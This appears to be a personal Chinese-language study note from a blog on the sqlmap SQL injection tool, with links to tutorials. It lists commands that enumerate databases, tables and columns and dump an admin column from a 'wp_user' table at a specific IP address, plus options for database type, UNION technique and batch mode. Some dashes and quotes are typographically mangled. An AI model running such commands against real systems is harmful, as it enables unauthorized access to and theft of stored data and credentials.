Sqlmap
Sqlmap
项目地址
sqlmapproject/sqlmap: Automatic SQL injection and database takeover tool
官方wiki
Usage · sqlmapproject/sqlmap Wiki
参考博文
https://blog.csdn.net/weixin_43819747/article/details/136736688
https://zhuanlan.zhihu.com/p/397917097
https://wiki.wgpsec.org/knowledge/tools/sqlmap.html
使用简记
获取所有数据库库名
python sqlmap.py -u “http://43.139.207.11/inject/my.php?id=1" –dbs
获取表名
python sqlmap.py -u “http://43.139.207.11/inject/my.php?id=1" -D db-test
–tables
获取字段名
python sqlmap.py -u “http://43.139.207.11/inject/my.php?id=1" -D db-test
-T wp_user –columns
获取数据
python sqlmap.py -u “http://43.139.207.11/inject/my.php?id=1" -D db-test
-T wp_user -C admin –dump
指定数据库类型
–dbms MySQL
指定SQL注入类型 为UNION联合型
–technique U
使用batch参数,可以在所有需要用户输入的部分(通常是询问执行yes还是no),执行默认操作,不需要用户再输入
–batch
强制停止
Ctrl+2C
Sqlmap
http://example.com/2024/04/06/Learn-Sqlmap/